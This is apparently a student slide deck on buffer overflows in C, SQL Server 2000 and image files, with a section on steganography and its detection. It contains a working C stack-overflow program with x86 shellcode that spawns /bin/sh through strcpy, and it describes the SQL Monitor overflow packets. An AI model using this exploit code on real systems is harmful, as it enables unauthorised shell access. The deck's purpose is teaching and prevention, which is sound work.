BUFFER OVERFLOW: A SHORT STUDY
Jonathan Hutchison, Robert Lee, Connor Mahoney, Caleb Wherry
Overview
Buffer Overflows: C/C++, SQL, Images
Steganography: Traditional, Digital
Basic Concepts
Buffer
Stack Memory
Heap Memory
Buffer Overflow
C/C++
SQL
Steganography
C/C++ Buffer Overflow Vulnerabilities
C/C++ on older Linux machines
Easiest to exploit.
Few protections against segmentation faults.
Many simple programs can cause serious damage on these machines.
Code libraries
Untrusted libraries.
Unstable functions.
Unsecured error checking.
C/C++ Buffer Overflow Vulnerabilities (cont.)
Exploitation using shell code
Shell code
Unstable C commands
C example: use of shell code to switch the user to “root”.
Use of the “strcpy()” function in C to cause a buffer overflow.
Dangerous for someone running an unsecured Linux machine.
```c
#include <stdio.h>
#include <string.h>

/* Shell code (32-bit Linux x86) that is executed once the buffer is
 * overflowed. It runs /bin/sh; in the slides' scenario this is how the
 * login is switched to "root". */
char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

char large_string[128];

int main(int argc, char *argv[])
{
    char buffer[96];                 /* buffer to overflow */
    int i;
    long *long_ptr = (long *)large_string;

    /* These for loops take the shell code and translate it into the large
     * string, and then in turn put the address of the full buffer into each
     * pointer-sized slot of large_string. */
    for (i = 0; i < 32; i++)
        *(long_ptr + i) = (long)buffer;

    for (i = 0; i < (int)strlen(shellcode); i++)
        large_string[i] = shellcode[i];

    /* The string copy function in C should be used with the utmost caution.
     * This is where the code blows up and causes the program to execute the
     * rest of the shell code on the command line. */
    strcpy(buffer, large_string);

    return 0;
}
```
Prevention of Buffer Overflow In C/C++
Use only trusted libraries when writing code.
Use updated software that helps prevent overflow.
Make sure your code checks the user input.
Use trusted programs, don’t use untested software.
Prevention of Buffer Overflow In C/C++ (cont.)
Administrative point of view
Don’t compromise quality for quantity. Don’t rush deadlines.
Make sure your programmers are happy and comfortable. Working conditions matter.
Error checking for all inputs is a must. Don’t cut corners.
Use software such as Flawfinder and Viega’s RATS to find possible code problems.
Buffer Overflow In SQL
SQL – Structured Query Language: a popular query language for relational database management.
In 2002, a Buffer Overflow vulnerability was discovered in Microsoft SQL Server 2000.
Both Stack based and Heap based attacks.
Attacks carried out through UDP port 1434, the SQL Monitor port.
Commonly used by legitimate clients attempting to connect: a single byte packet, set to 0x02.
Stack Based Buffer Overflow Attack
First byte set to 0x04
Instructs the SQL Monitor to open a registry key.
If followed by a large number of bytes, stack based buffer is overflowed.
Return address overwritten
Redirects the SQL Server process to execute code of the attacker’s choice.
Heap Based Buffer Overflow Attack
Carried out using a similar technique.
First byte set to 0x08, followed by a message with a certain format.
Formatted properly, the attack avoids access violation errors before the heap is overflowed.
Vulnerability in SQL Server 2000 code:
Return values not validated.
Unhandled exceptions.
Current process fails, resulting effectively in a denial of service attack.
Buffer Overflow In Images
iPhone: www.jailbreakme.com
Alter file header in TIFF image
New memory pointer
Crashes browser
Unlocks file system
Other exploits
Windows: JPEG (GDI+ API), BMP, GIF
Linux: PNG
Macintosh, iPhone & PSP: TIFF
Traditional Steganography
Image from a laser printer under 10x magnification
Traditional Steganography (cont.)
Digital Steganography
How it works
Each pixel has 24 bits for 3 colors (255 shades/color).
Change 1 or 2 color bits every pixel. Adds up quickly.
Bits can be encoded & decoded with a program.
No quality or size difference.
Images Video Audio
Detection and Prevention
Compare with an original by checksum
Check same color pixels for different values
Statistical analysis
Algorithm detection
Compression & formatting
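The bit-per-pixel scheme from the "How it works" slide and the compare-with-original check from the detection list, as an added example in C that is not from the original slides. It assumes a raw 8x8 RGB byte buffer constructed in the code (no image file format), one hidden bit per colour byte, and hypothetical function names lsb_embed, lsb_extract, lsb_diff and lsb_demo.

```c
/* Added example (not from the slides): 1-bit LSB embedding in a constructed
 * 8x8 RGB buffer (3 bytes/pixel, no header) and the compare-with-original check. */
#include <stdint.h>
#include <string.h>
#define COVER_LEN (8 * 8 * 3)

/* Put each message bit (MSB first) into the low bit of one colour byte.
 * Returns bytes embedded, or -1 if the cover cannot hold the message. */
int lsb_embed(uint8_t *cover, size_t cover_len, const uint8_t *msg, size_t msg_len) {
    if (msg_len * 8 > cover_len) return -1;
    for (size_t i = 0; i < msg_len * 8; i++)
        cover[i] = (uint8_t)((cover[i] & 0xFE) | ((msg[i / 8] >> (7 - i % 8)) & 1));
    return (int)msg_len;
}

/* Rebuild msg_len bytes from the low bits of a stego buffer. */
int lsb_extract(const uint8_t *stego, size_t stego_len, uint8_t *out, size_t msg_len) {
    if (msg_len * 8 > stego_len) return -1;
    memset(out, 0, msg_len);
    for (size_t i = 0; i < msg_len * 8; i++)
        out[i / 8] = (uint8_t)((out[i / 8] << 1) | (stego[i] & 1));
    return (int)msg_len;
}

/* Detection by comparison: bytes that differ from the original, and the
 * largest per-byte change (a 1-bit embed never moves a byte by more than 1). */
size_t lsb_diff(const uint8_t *orig, const uint8_t *img, size_t len, int *max_delta) {
    size_t n = 0; *max_delta = 0;
    for (size_t i = 0; i < len; i++) {
        int d = orig[i] > img[i] ? orig[i] - img[i] : img[i] - orig[i];
        n += (d != 0);
        if (d > *max_delta) *max_delta = d;
    }
    return n;
}

/* Round trip of "hi" through a constructed gradient cover: returns the number
 * of bytes changed, -1 if extraction fails, -2 if any byte moved by more than 1. */
int lsb_demo(void) {
    uint8_t orig[COVER_LEN], img[COVER_LEN], out[2];
    const uint8_t msg[2] = { 'h', 'i' };
    int max_delta;
    for (size_t i = 0; i < COVER_LEN; i++) orig[i] = (uint8_t)(i * 3);
    memcpy(img, orig, COVER_LEN);
    if (lsb_embed(img, COVER_LEN, msg, 2) < 0 ||
        lsb_extract(img, COVER_LEN, out, 2) < 0 || memcmp(out, msg, 2) != 0)
        return -1;
    size_t changed = lsb_diff(orig, img, COVER_LEN, &max_delta);
    return max_delta > 1 ? -2 : (int)changed;
}
```

Without the original to diff against, the changed bytes are indistinguishable from sensor noise, which is why the other detection methods on the slide (statistical analysis, algorithm detection) exist.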
Example
Original image | Hidden image